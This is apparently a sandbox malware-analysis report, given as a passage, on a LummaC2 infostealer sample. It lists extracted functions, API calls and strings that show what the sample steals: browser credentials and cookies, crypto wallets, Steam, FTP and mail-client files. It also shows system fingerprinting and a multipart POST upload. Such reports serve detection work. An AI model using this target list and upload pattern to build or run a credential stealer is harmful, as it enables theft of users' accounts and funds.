Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
API String ID: 0-3008219856
Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F

Function 00436ADC Relevance: 91.3, APIs: 22, Strings: 29, Instructions: 2004COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0043700A
KiUserCallbackDispatcher.NTDLL(00000000), ref: 0043726A
_strlen.LIBCMT ref: 004377D2
_strlen.LIBCMT ref: 0043788B
_strlen.LIBCMT ref: 00438B52
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 00438BA3
_strlen.LIBCMT ref: 00438BAC
_strlen.LIBCMT ref: 00438C5F
_strlen.LIBCMT ref: 00438CD1

Strings

sion, xrefs: 00438638
advapi32.dll, xrefs: 00438CB3
y_B>, xrefs: 00436BC2
Lum576xedmaC2, Build 20233101, xrefs: 0043824A
n._, xrefs: 00436FA9
n: , xrefs: 00438640
kernel32.dll, xrefs: 00437F81, 004386D8, 00438A67
o._, xrefs: 00436C86
q7 C, xrefs: 004371EB
LID(Lu576xedmma ID): , xrefs: 00438263
4jn`, xrefs: 00437077
TT4, xrefs: 00437101
- HW576xedID: , xrefs: 0043841F
C: , xrefs: 00437F16
y_B>, xrefs: 00438149
- Phys576xedical Ins576xedtalled Memor576xedy: , xrefs: 004373D9
$jRk, xrefs: 004370BA
user32.dll, xrefs: 00436F71, 004388BF
Syste576xedm.txt, xrefs: 004381E6
p7 C, xrefs: 004371E0
- Screen Resoluton: , xrefs: 0043887A
o._, xrefs: 00437C1B
GhYuIq, xrefs: 00438C49
- CP576xedU Name: , xrefs: 00436FE0
Ver, xrefs: 00438630
x_B>, xrefs: 00436BB7
Aan(, xrefs: 004377FD
%s (%d.%d.%d), xrefs: 00438606
4jn`, xrefs: 00436D91

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
API String ID: 3760342818-3740799521
Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B

Function 0040B81C Relevance: 70.2, APIs: 17, Strings: 22, Instructions: 1922stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
lstrcatW.KERNEL32(?,?), ref: 0040C427
lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
lstrlenW.KERNEL32(?), ref: 0040C581
lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
lstrlenW.KERNEL32(00001A2F), ref: 0040C901
lstrlenW.KERNEL32(00001A2F), ref: 0040D826

Strings

Y=`, xrefs: 0040D07D
Ku^%, xrefs: 0040C4E3
{#9, xrefs: 0040B98F
Ku^%, xrefs: 0040D1F5
ntdll.dll, xrefs: 0040CCDE, 0040D538, 0040D59F
L2&e, xrefs: 0040CA7D
K2&e, xrefs: 0040C262
bi, xrefs: 0040BCD9
Y=`, xrefs: 0040BF65
L2&e, xrefs: 0040CFFB
Ku^%, xrefs: 0040BE93
"B!H, xrefs: 0040C01E
kernel32.dll, xrefs: 0040BA2D
Ku^%, xrefs: 0040D2EB
{#9, xrefs: 0040C68A
LOCK, xrefs: 0040D3C0
"B!H, xrefs: 0040CD2B
Y[[T, xrefs: 0040BA47
\??\, xrefs: 0040CC06
Ku^%, xrefs: 0040D785
Ku^%, xrefs: 0040BD4A
Ku^%, xrefs: 0040D407

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcmp
String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
API String ID: 156957741-3266097529
Opcode ID: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
Opcode Fuzzy Hash: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F

Function 0041F9A4 Relevance: 40.6, APIs: 6, Strings: 16, Instructions: 2064COMMON

Download Yara Rule

Strings

"w, xrefs: 004201BD
VL6T, xrefs: 004215D1
eo>w, xrefs: 0041FE06
"w, xrefs: 0041FD1F
_m.Q, xrefs: 0042046C
_m.Q, xrefs: 00421C7C
VL6T, xrefs: 0041FFA0
EeS, xrefs: 00420D0C
EeS, xrefs: 0041FF95
KI3i, xrefs: 00421D30
fo>w, xrefs: 0042133B
mNA/, xrefs: 0041FA0C
fo>w, xrefs: 0042079B
KI3i, xrefs: 004209BF
JI3i, xrefs: 004200BA
EeS, xrefs: 00420E73

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
API String ID: 0-3469262258
Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F

Function 0040E14E Relevance: 40.3, APIs: 6, Strings: 16, Instructions: 1822stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3

Strings

n_v, xrefs: 0040F040
"t8, xrefs: 0040E6AF
Pz#, xrefs: 0040F5D4
Ied|, xrefs: 0040F83D
"t8, xrefs: 0040F623
n_v, xrefs: 0040FE12
)lu, xrefs: 0040EEC0
kernel32.dll, xrefs: 0040E764
v2B, xrefs: 0040E894
u2B, xrefs: 0040E89E
v2B, xrefs: 0040F158
(lu, xrefs: 0040E72D
)lu, xrefs: 0040F035
Ied|, xrefs: 0040E74E
Pz#, xrefs: 0040E59F
!t8, xrefs: 0040E6A4

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
API String ID: 4038537762-116603239
Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B

Function 00430E6C Relevance: 39.9, APIs: 14, Strings: 8, Instructions: 1432memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
GetProcessHeap.KERNEL32 ref: 004314B2
HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
ReleaseDC.USER32(00000000,?), ref: 00432204
GetProcessHeap.KERNEL32 ref: 004326F0
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
GetProcessHeap.KERNEL32 ref: 00432701
HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708

Strings

TT4, xrefs: 00432147
y_B>, xrefs: 004314CE
TT4, xrefs: 00431425
q7 C, xrefs: 004317E9
$jRk, xrefs: 004313CB
?, xrefs: 004325D3
q7 C, xrefs: 00430F99
y_B>, xrefs: 0043222D

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocAllocateBitsRelease
String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
API String ID: 2023195035-2600574631
Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B

Function 00434080 Relevance: 39.4, APIs: 10, Strings: 12, Instructions: 872registryCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004346DB
RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
RegCloseKey.KERNELBASE(?), ref: 0043475B
RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76

Strings

%s\%s, xrefs: 00434CF1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0043495F, 00434CEC
TT4, xrefs: 00434C71
%s%s, xrefs: 004346D5
Software.txt, xrefs: 00434E05
TT4, xrefs: 00434543
$jRk, xrefs: 00434578
?, xrefs: 00434915
DisplayName, xrefs: 00434BF4
$jRk, xrefs: 00434B06
y_B>, xrefs: 00434738
y_B>, xrefs: 0043463A

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Close$EnumOpenwsprintf
String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
API String ID: 44529101-205855365
Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B

Function 0042AD82 Relevance: 25.7, Strings: 20, Instructions: 749COMMON

Download Yara Rule

Strings

*.MSG, xrefs: 0042B597, 0042B77D
*.TBB, xrefs: 0042B51E, 0042B571
%localappdata%\The Bat!, xrefs: 0042B935
(lu, xrefs: 0042AF6C
Mail Clients\The Bat\Local, xrefs: 0042B040, 0042B045, 0042B058, 0042B06B, 0042B518, 0042B51D, 0042B530, 0042B619, 0042B777, 0042B77C, 0042B78F, 0042B7A2, 0042B8B4, 0042B909
*.EML, xrefs: 0042B0B1, 0042B790
kernel32.dll, xrefs: 0042B5B3, 0042B8E5
*.ABD, xrefs: 0042B059, 0042B0EA
n_v, xrefs: 0042B244
*.mbox, xrefs: 0042B046, 0042B0D7
*.MSB, xrefs: 0042B0C4, 0042B7A3
*.HBI, xrefs: 0042B19F, 0042B90E
%appdata%\The Bat!, xrefs: 0042B265
*.TBK, xrefs: 0042B110, 0042B8B9
*.TBN, xrefs: 0042B531, 0042B584
Mail Clients\The Bat\AppData, xrefs: 0042B0AB, 0042B0B0, 0042B0C3, 0042B0D6, 0042B0E9, 0042B0FC, 0042B10F, 0042B199, 0042B19E, 0042B1B1, 0042B56B, 0042B570, 0042B583, 0042B596
*.FLX, xrefs: 0042B06C, 0042B0FD
n_v, xrefs: 0042AFFA
)lu, xrefs: 0042B239
*.txt, xrefs: 0042B1B2, 0042B61E

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
API String ID: 4038537762-373908387
Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

Function 00405AAA Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 448
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E

Strings

n_v, xrefs: 00405C99
\Loc576xedal Extens576xedion Settin576xedgs\, xrefs: 00405EC6
/Ext576xedensio576xedns/, xrefs: 00405EF5
,, xrefs: 00405C1E
*576xed, xrefs: 004061E5
n_v, xrefs: 00405B64

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
API String ID: 4038537762-1578839816
Opcode ID: 06c033a404d0e89150b013ef1b854d6f2c769d7e75bb802a7d794481f98f3895
Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
Opcode Fuzzy Hash: 06c033a404d0e89150b013ef1b854d6f2c769d7e75bb802a7d794481f98f3895
Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B

Function 0041C270 Relevance: 23.6, APIs: 1, Strings: 12, Instructions: 812COMMON

Download Yara Rule

Strings

9a%^, xrefs: 0041CF0D
M%, xrefs: 0041C3CB
POST, xrefs: 0041C824
M%, xrefs: 0041C500
L%, xrefs: 0041C3AA
Content-Type: multipart/form-data; boundary=%s, xrefs: 0041CCD2
SqDe87817huf871793q74, xrefs: 0041CCCD
TeslaBrowser/5.5, xrefs: 0041C870
winhttp.dll, xrefs: 0041C43E, 0041C859, 0041C85E, 0041C880, 0041C8A2, 0041CA62, 0041CACA, 0041CC64, 0041CD5B, 0041CDBE, 0041CF1A, 0041CFAF
9a%^, xrefs: 0041C480
9a%^, xrefs: 0041C5DF
9a%^, xrefs: 0041C981

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
API String ID: 0-485045143
Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

Function 0040620B Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 445
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
lstrcatW.KERNEL32(?,?), ref: 00406423
lstrcatW.KERNEL32(?,?), ref: 0040692A
lstrcatW.KERNEL32(?,0045E102), ref: 00406934

Strings

Ku^%, xrefs: 004068CD
Y=`, xrefs: 004065CA
Y=`, xrefs: 00406310
Ku^%, xrefs: 004065EC

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: Ku^%$Ku^%$Y=`$Y=`
API String ID: 4038537762-3617128223
Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

Function 0042B9C5 Relevance: 16.7, Strings: 13, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*.CNM, xrefs: 0042BA7B
*.PMN, xrefs: 0042BAA1
C:\PMAIL, xrefs: 0042BB07
Mail Clients\Pegasus, xrefs: 0042BA75, 0042BA7A, 0042BA8D, 0042BAA0, 0042BAB3, 0042BE2B, 0042BE30, 0042BE43, 0042BE56, 0042BE69
*.PML, xrefs: 0042BAB4
*.PM, xrefs: 0042BE57
Ku^%, xrefs: 0042BE15
kernel32.dll, xrefs: 0042BA16
*CACHE.PM, xrefs: 0042BE31
*.WPM, xrefs: 0042BE44
*.USR, xrefs: 0042BE6A
*.PMF, xrefs: 0042BA8E
Ku^%, xrefs: 0042BCB6

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
API String ID: 0-3904125897
Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

Function 0040A928 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 475
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,774D0880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,774D0880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2

Strings

ntdll.dll, xrefs: 0040AF92, 0040B092
\??\, xrefs: 0040ACBA
kernel32.dll, xrefs: 0040A947

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID: \??\$kernel32.dll$ntdll.dll
API String ID: 1475610065-320376045
Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

Function 0042FD35 Relevance: 14.1, Strings: 11, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ku^%, xrefs: 0042FD7B
Ku^%, xrefs: 0042FE0F
Ku^%, xrefs: 00430089
logins.json, xrefs: 00430206
key4.db, xrefs: 0042FE54
places.sqlite, xrefs: 00430215
Ku^%, xrefs: 0042FFF1
Ku^%, xrefs: 0043018E
cookies.sqlite, xrefs: 004301F4
formhistory.sqlite, xrefs: 0042FD98
cert9.db, xrefs: 0042FD86

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
API String ID: 4038537762-2469458786
Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

Function 004262A1 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 391
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(fltl), ref: 004263DE

Strings

dll, xrefs: 004263C1
SysmonDrv, xrefs: 0042662E
A8r, xrefs: 00426415
fltl, xrefs: 004263D9, 004263DD
ib.d, xrefs: 004263C9

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: A8r$SysmonDrv$dll$fltl$ib.d
API String ID: 1029625771-1616023887
Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B

Function 00402476 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 655COMMON

Download Yara Rule

Strings

UL6T, xrefs: 0040263D
VL6T, xrefs: 00402A09
M0@, xrefs: 00402DE3

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: M0@$UL6T$VL6T
API String ID: 0-769956738
Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

Function 0040B129 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,7750F770,7750F770), ref: 0040B792
NtClose.NTDLL ref: 0040B7B1

Strings

LK, xrefs: 0040B723
ntdll.dll, xrefs: 0040B425, 0040B61B, 0040B797
Y[, xrefs: 0040B682

Memory Dump Source

Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CloseFileRead
String ID: LK$Y[$ntdll.dll
API String ID: 752142053-4222218168
Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F

Function 00422177 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984

